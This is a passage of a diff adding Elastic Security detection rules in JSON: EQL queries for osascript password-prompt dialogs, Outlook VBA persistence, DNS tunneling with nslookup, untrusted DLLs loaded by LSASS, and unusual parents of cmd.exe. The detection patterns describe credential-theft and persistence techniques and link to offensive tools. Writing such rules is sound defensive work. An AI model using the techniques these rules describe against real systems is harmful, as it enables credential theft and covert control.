"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_107.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_107.json new file mode 100644 index 00000000000..2e5e437bf6c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_107.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of osascript to execute scripts via standard input that may prompt a user with a rogue dialog for credentials.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Prompt for Credentials with OSASCRIPT", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*display dialog*password*\"\n", + "references": [ + "https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/prompt.py", + "https://ss64.com/osx/osascript.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1056", + "name": "Input Capture", + "reference": "https://attack.mitre.org/techniques/T1056/", + "subtechnique": [ + { + "id": "T1056.002", + "name": "GUI Input Capture", + "reference": "https://attack.mitre.org/techniques/T1056/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_106.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_106.json new file mode 100644 index 00000000000..8239a6191f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_106.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to establish persistence on an endpoint by installing a rogue Microsoft Outlook VBA Template.", + "false_positives": [ + "A legitimate VBA for Outlook is usually configured interactively via OUTLOOK.EXE." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Microsoft Outlook VBA", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM\"\n", + "references": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "397945f3-d39a-4e6f-8bcb-9656c2031438_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_107.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_107.json new file mode 100644 index 00000000000..6596dce4a67 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_107.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to establish persistence on an endpoint by installing a rogue Microsoft Outlook VBA Template.", + "false_positives": [ + "A legitimate VBA for Outlook is usually configured interactively via OUTLOOK.EXE." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Microsoft Outlook VBA", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM\"\n", + "references": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "397945f3-d39a-4e6f-8bcb-9656c2031438_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_110.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_110.json new file mode 100644 index 00000000000..3b0c26702ed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_110.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DNS Tunneling via NsLookup", + "note": "## Triage and analysis\n\n### Investigating Potential DNS Tunneling via NsLookup\n\nAttackers can abuse existing network rules that allow DNS communication with external resources to use the protocol as their command and control and/or exfiltration channel.\n\nDNS queries can be used to infiltrate data such as commands to be run, malicious files, etc., and also for exfiltration, since queries can be used to send data to the attacker-controlled DNS server. This process is commonly known as DNS tunneling.\n\nMore information on how tunneling works and how it can be abused can be found on [Palo Alto Unit42 Research](https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors).\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the DNS query and identify the information sent.\n- Extract this communication's indicators of compromise (IoCs) and use traffic logs to search for other potentially compromised hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If the parent process is trusted and the data sent is not sensitive nor command and control related, this alert can be closed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Immediately block the identified indicators of compromise (IoCs).\n- Implement any temporary network rules, procedures, and segmentation required to contain the attack.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Update firewall rules to be more restrictive.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id with maxspan=5m\n[process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"nslookup.exe\" and process.args:(\"-querytype=*\", \"-qt=*\", \"-q=*\", \"-type=*\")] with runs = 10\n", + "references": [ + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3a59fc81-99d3-47ea-8cd6-d48d561fca20", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.004", + "name": "DNS", + "reference": "https://attack.mitre.org/techniques/T1071/004/" + } + ] + }, + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "3a59fc81-99d3-47ea-8cd6-d48d561fca20_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_7.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_7.json new file mode 100644 index 00000000000..72c72bd7fca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_7.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies LSASS loading an unsigned or untrusted DLL. Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Module Loaded by LSASS", + "query": "library where host.os.type == \"windows\" and process.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\" and\n not (dll.code_signature.subject_name :\n (\"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows Software Compatibility Publisher\",\n \"Microsoft Windows Hardware Compatibility Publisher\",\n \"McAfee, Inc.\",\n \"SecMaker AB\",\n \"HID Global Corporation\",\n \"HID Global\",\n \"Apple Inc.\",\n \"Citrix Systems, Inc.\",\n \"Dell Inc\",\n \"Hewlett-Packard Company\",\n \"Symantec Corporation\",\n \"National Instruments Corporation\",\n \"DigitalPersona, Inc.\",\n \"Novell, Inc.\",\n \"gemalto\",\n \"EasyAntiCheat Oy\",\n \"Entrust Datacard Corporation\",\n \"AuriStor, Inc.\",\n \"LogMeIn, Inc.\",\n \"VMware, Inc.\",\n \"Istituto Poligrafico e Zecca dello Stato S.p.A.\",\n \"Nubeva Technologies Ltd\",\n \"Micro Focus (US), Inc.\",\n \"Yubico AB\",\n \"GEMALTO SA\",\n \"Secure Endpoints, Inc.\",\n \"Sophos Ltd\",\n \"Morphisec Information Security 2014 Ltd\",\n \"Entrust, Inc.\",\n \"Nubeva Technologies Ltd\",\n \"Micro Focus (US), Inc.\",\n \"F5 Networks Inc\",\n \"Bit4id\",\n \"Thales DIS CPL USA, Inc.\",\n \"Micro Focus International plc\",\n \"HYPR Corp\",\n \"Intel(R) Software Development Products\",\n \"PGP Corporation\",\n \"Parallels International GmbH\",\n \"FrontRange Solutions Deutschland GmbH\",\n \"SecureLink, Inc.\",\n \"Tidexa OU\",\n \"Amazon Web Services, Inc.\",\n \"SentryBay Limited\",\n \"Audinate Pty Ltd\",\n \"CyberArk Software Ltd.\",\n \"McAfeeSysPrep\",\n \"NVIDIA Corporation PE Sign v2016\",\n \"Trend Micro, Inc.\",\n \"Fortinet Technologies (Canada) Inc.\",\n \"Carbon Black, Inc.\") and\n dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\")) and\n\n not dll.hash.sha256 :\n (\"811a03a5d7c03802676d2613d741be690b3461022ea925eb6b2651a5be740a4c\",\n \"1181542d9cfd63fb00c76242567446513e6773ea37db6211545629ba2ecf26a1\",\n \"ed6e735aa6233ed262f50f67585949712f1622751035db256811b4088c214ce3\",\n \"26be2e4383728eebe191c0ab19706188f0e9592add2e0bf86b37442083ae5e12\",\n \"9367e78b84ef30cf38ab27776605f2645e52e3f6e93369c674972b668a444faa\",\n \"d46cc934765c5ecd53867070f540e8d6f7701e834831c51c2b0552aba871921b\",\n \"0f77a3826d7a5cd0533990be0269d951a88a5c277bc47cff94553330b715ec61\",\n \"4aca034d3d85a9e9127b5d7a10882c2ef4c3e0daa3329ae2ac1d0797398695fb\",\n \"86031e69914d9d33c34c2f4ac4ae523cef855254d411f88ac26684265c981d95\")\n", + "references": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-2/", + "https://github.com/jas502n/mimikat_ssp" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_8.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_8.json new file mode 100644 index 00000000000..2a5eef658c0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_8.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies LSASS loading an unsigned or untrusted DLL. Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Module Loaded by LSASS", + "query": "library where host.os.type == \"windows\" and process.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\" and\n not (dll.code_signature.subject_name :\n (\"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows Software Compatibility Publisher\",\n \"Microsoft Windows Hardware Compatibility Publisher\",\n \"McAfee, Inc.\",\n \"SecMaker AB\",\n \"HID Global Corporation\",\n \"HID Global\",\n \"Apple Inc.\",\n \"Citrix Systems, Inc.\",\n \"Dell Inc\",\n \"Hewlett-Packard Company\",\n \"Symantec Corporation\",\n \"National Instruments Corporation\",\n \"DigitalPersona, Inc.\",\n \"Novell, Inc.\",\n \"gemalto\",\n \"EasyAntiCheat Oy\",\n \"Entrust Datacard Corporation\",\n \"AuriStor, Inc.\",\n \"LogMeIn, Inc.\",\n \"VMware, Inc.\",\n \"Istituto Poligrafico e Zecca dello Stato S.p.A.\",\n \"Nubeva Technologies Ltd\",\n \"Micro Focus (US), Inc.\",\n \"Yubico AB\",\n \"GEMALTO SA\",\n \"Secure Endpoints, Inc.\",\n \"Sophos Ltd\",\n \"Morphisec Information Security 2014 Ltd\",\n \"Entrust, Inc.\",\n \"Nubeva Technologies Ltd\",\n \"Micro Focus (US), Inc.\",\n \"F5 Networks Inc\",\n \"Bit4id\",\n \"Thales DIS CPL USA, Inc.\",\n \"Micro Focus International plc\",\n \"HYPR Corp\",\n \"Intel(R) Software Development Products\",\n \"PGP Corporation\",\n \"Parallels International GmbH\",\n \"FrontRange Solutions Deutschland GmbH\",\n \"SecureLink, Inc.\",\n \"Tidexa OU\",\n \"Amazon Web Services, Inc.\",\n \"SentryBay Limited\",\n \"Audinate Pty Ltd\",\n \"CyberArk Software Ltd.\",\n \"McAfeeSysPrep\",\n \"NVIDIA Corporation PE Sign v2016\",\n \"Trend Micro, Inc.\",\n \"Fortinet Technologies (Canada) Inc.\",\n \"Carbon Black, Inc.\") and\n dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\")) and\n\n not dll.hash.sha256 :\n (\"811a03a5d7c03802676d2613d741be690b3461022ea925eb6b2651a5be740a4c\",\n \"1181542d9cfd63fb00c76242567446513e6773ea37db6211545629ba2ecf26a1\",\n \"ed6e735aa6233ed262f50f67585949712f1622751035db256811b4088c214ce3\",\n \"26be2e4383728eebe191c0ab19706188f0e9592add2e0bf86b37442083ae5e12\",\n \"9367e78b84ef30cf38ab27776605f2645e52e3f6e93369c674972b668a444faa\",\n \"d46cc934765c5ecd53867070f540e8d6f7701e834831c51c2b0552aba871921b\",\n \"0f77a3826d7a5cd0533990be0269d951a88a5c277bc47cff94553330b715ec61\",\n \"4aca034d3d85a9e9127b5d7a10882c2ef4c3e0daa3329ae2ac1d0797398695fb\",\n \"86031e69914d9d33c34c2f4ac4ae523cef855254d411f88ac26684265c981d95\")\n", + "references": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-2/", + "https://github.com/jas502n/mimikat_ssp" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_109.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_109.json new file mode 100644 index 00000000000..309a444bf97 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_109.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious parent child process relationship with cmd.exe descending from an unusual process.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Parent Process for cmd.exe", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and\n process.parent.name : (\"lsass.exe\",\n \"csrss.exe\",\n \"epad.exe\",\n \"regsvr32.exe\",\n \"dllhost.exe\",\n \"LogonUI.exe\",\n \"wermgr.exe\",\n \"spoolsv.exe\",\n \"jucheck.exe\",\n \"jusched.exe\",\n \"ctfmon.exe\",\n \"taskhostw.exe\",\n \"GoogleUpdate.exe\",\n \"sppsvc.exe\",\n \"sihost.exe\",\n \"slui.exe\",\n \"SIHClient.exe\",\n \"SearchIndexer.exe\",\n \"SearchProtocolHost.exe\",\n \"FlashPlayerUpdateService.exe\",\n \"WerFault.exe\",\n \"WUDFHost.exe\",\n \"unsecapp.exe\",\n \"wlanext.exe\" ) and\n not (process.parent.name : \"dllhost.exe\" and process.parent.args : \"/Processid:{CA8C87C1-929D-45BA-94DB-EF8E6CB346AD}\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3b47900d-e793-49e8-968f-c90dc3526aa1_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_110.json b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_110.json new file mode 100644 index 00000000000..9cbf2255570 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_110.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious parent child process relationship with cmd.exe descending from an unusual process.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Parent Process for cmd.exe", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and\n process.parent.name : (\"lsass.exe\",\n \"csrss.exe\",\n \"epad.exe\",\n \"regsvr32.exe\",\n 